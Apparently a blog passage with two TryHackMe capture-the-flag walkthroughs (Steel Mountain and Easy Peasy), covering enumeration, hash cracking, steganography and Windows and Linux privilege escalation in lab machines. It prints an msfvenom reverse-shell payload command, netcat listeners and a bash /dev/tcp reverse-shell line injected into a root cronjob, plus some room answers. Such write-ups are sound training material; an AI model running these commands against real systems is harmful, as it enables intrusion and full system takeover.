meterpreter > upload PowerUp.ps1
meterpreter > load powershell
meterpreter > powershell_shell

Once inside the PowerShell environment, I loaded the script and ran the checks.

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

The script identified a service with an Unquoted Service Path vulnerability and, critically, the CanRestart option was set to True. This means we can restart the service to trigger our payload.

Answer 6

Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

AdvancedSystemCareService9

[!NOTE] The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Exploitation

The vulnerability discovered was an Unquoted Service Path in AdvancedSystemCareService9. The service path was: C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Because the path contains spaces and is unquoted, Windows attempts to execute files in this order:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\Advanced.exe <--- Target
...and so on.

Since we have write permissions to the IObit directory, we can plant a malicious executable named Advanced.exe, restart the service, and Windows will run our file with LocalSystem privileges.

Step 1: Generating the Payload

I generated a reverse shell payload named Advanced.exe using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

Step 2: Uploading the Payload

Back in my Meterpreter session, I navigated to the target directory and uploaded the malicious binary.


cd "C:/Program Files (x86)/IObit"
upload Advanced.exe

Step 3: Triggering the Exploit

I started a Netcat listener on my attack machine to catch the shell.


nc -lvnp 4443

Then, I dropped into a system shell on the target machine and manually restarted the service to trigger the execution of Advanced.exe.


# Inside Meterpreter
shell

# Command Prompt
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

Step 4: Root Flag

As soon as the service started, my listener caught the connection. I verified my identity as nt authority\system (Administrator) and retrieved the final flag.


whoami

cd C:\Users\Administrator\Desktop\

type root.txt

Answer 7

What is the root flag?

9af5f314f57607c00fd09803**********

Conclusion

Steel Mountain is a fantastic room for practicing Windows privilege escalation fundamentals. We started by enumerating the machine and discovering a vulnerable file server (Rejetto HFS). We explored two distinct paths to compromise the machine:

Metasploit: Utilizing CVE-2014-6287 for immediate access.
Manual Enumeration: Using PowerUp.ps1 to identify an Unquoted Service Path vulnerability in AdvancedSystemCareService9.

By replacing the service binary with our own payload and restarting the service, we successfully escalated our privileges from a standard user to NT AUTHORITY\SYSTEM.

Challenge for the Reader

While using Metasploit is fast, I highly recommend attempting Task 4 of this room on your own. It challenges you to exploit the machine without Metasploit, using Python scripts and a static Netcat binary. Understanding how to manually transfer files and catch shells without meterpreter is a critical skill for the OSCP and real-world engagements.

Thanks for reading! Happy Hacking.

TryHackMe: Easy Peasy Walkthrough

Tue, 20 Jan 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/easypeasyctf

Introduction

Welcome to my first writeup for the Easy Peasy room on TryHackMe. This room provides a great mix of enumeration, cryptography, and steganography challenges. Let's dive in!

Enumeration

Nmap Scan

I started with a comprehensive Nmap scan to identify open ports and running services.

nmap -sV -sC -p- -T5 -Pn -o nmap_scan 10.66.154.228

My scan revealed the following open ports:

80/tcp (HTTP): Nginx 1.16.1
6498/tcp (SSH): OpenSSH 7.6p1
65524/tcp (HTTP): Apache httpd 2.4.43

[!NOTE] It's interesting to see two different web servers running on the same machine: Nginx on port 80 and Apache on port 65524.

Here is the raw output from my scan:

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_

Task 1 Answers

Question	Answer
How many ports are open?	`3`
What is the version of nginx?	`1.16.1`
What is running on the highest port?	`Apache`

Task 2: Compromising the machine

Enumerating Web Services

Port 80 (Nginx) & Port 65524 (Apache)

Port 80 hosts the default Nginx page, while port 65524 shows the Apache default page. Both have robots.txt entries. Inspecting the source code and robots.txt is always a good first step.

Directory Bruteforcing (GoBuster)

You can use GoBuster to enumerate hidden directories on the web servers. This is crucial for finding flags that aren't linked from the main pages.

gobuster dir -u http://10.66.154.228 -w /usr/share/wordlists/dirb/common.txt

However, I prefer using FeroxBuster as it is faster and more powerful.

During my enumeration, I discovered a hidden directory named /hidden but after inspecting seems nothing useful in it. Further digging into /hidden/whatever and inspecting the source page of this directory I found a paragraph text encoded in base64.

[!NOTE] “==” is often a base64 string.

We could decode this with

echo "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d

For me I have used a popular plateform called Cyberchef.

Bingo! Flag Found

Flag 1

Using GoBuster, find flag 1.

flag{REDACTED}

With Port 80 fully enumerated, let's investigate Port 65524.

Default Apache server webpage :

Hmm... This is not the default Apache header, so it’s worth keeping in mind for later.

During my Nmap scan, I noticed that /robots.txt exists, so let’s check it out.

Inside it, we find the following entry:

User-Agent: a18672860d0510e5ab6699730763b250

This looks like an MD5 hash.

To crack it, we can use tools like hashcat or John the Ripper, or simply try an online hash-cracking service. For me I prefer https://hashes.com

Flag 2

Further enumerate the machine, what is flag 2?

flag{REDACTED}

While searching for Flag 3, I got stuck for a bit. Remembering the unusual Apache header I noticed earlier, I went back and re-read the page carefully, where I eventually found the flag hidden in the text.

Flag 3

Crack the hash with easypeasy.txt, What is the flag 3?

flag{REDACTED}

Viewing the source code revealed something..

The hint "ba...." clearly suggested Base64 encoding. I decoded the string using Cyberchef and I found a hidden directory:

Question4

What is the hidden directory?

/n0th1ng3ls3m4tt3r

I navigated to the hidden directory and The page displayed a random image that seemed suspicious. Let's download it using wget <link-to-image> for later use.

Digging into the source code once again revealed a suspicious hash:

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

[!NOTE] A 64-character hash is usually SHA-256, but it's often a trick. Using hashid or an online tools like Name That Hash, I saw it could be GOST (a Russian hash standard).

Steganography and Cracking

I used john with the easypeasy.txt wordlist provided by the room. I explicitly forced the format to GOST to avoid false positives.

john --format=gost --wordlist=easypeasy.txt hash.txt

Crack Successful:

Question 5

Using the wordlist that provided to you in this task crack the hash what is the password?

mypasswordforthatjob

With the password in hand, and the downloaded image binarycodepixabay.jpg from the hidden page. The password suggested it was a key for steganography.

I used steghide to extract hidden data:

steghide extract -sf binarycodepixabay.jpg
# Passphrase: mypasswordforthatjob

It extracted a file named secrettext.txt containing a binary string:

username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

Decoding this binary string:

python3 -c "print(''.join([chr(int(b, 2)) for b in '01101001...'.split()]))"

Or using Cyberchef which decoded to:

Question 6

What is the password to login to the machine via SSH?

iconvertedmypasswordtobinary

SSH Access

I used this password to SSH into the machine:

ssh boring@10.66.154.228 -p 6498

[!NOTE] SSH is not running on the default port (22), but on port 6498. So we have to specify the -p flag to ssh to login using that port.

Once logged in, I found the User Flag in user.txt. However, the content appeared to be rotated, making it unreadable at first glance. Since the rotation value was unknown, I used CyberChef to brute‑force all possible rotations until the readable flag was revealed.

Flag 7

What is the user flag?

flag{REDACTED}

Privilege Escalation

After enumerating the system for privilege escalation vectors (checking SUID binaries, crontabs, etc.), I found a vulnerable cronjob running as root.

cat /etc/crontab

The Vulnerability: I found a specific line indicating a vulnerability:

* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh

This script runs every minute as root. I checked the permissions of the file and confirmed that my user boring had write access.

I injected a Bash reverse shell one-liner into the script to force root to connect back to my attack machine.

On Kali (Listener):

nc -lvnp 4444

On Target (Injection):

echo "bash -i >& /dev/tcp/<MY_IP>/4444 0>&1" > /var/www/.mysecretcronjob.sh

Finally, I read the Root Flag from /root/root.txt.

Flag 8

What is the root flag?

flag{REDACTED}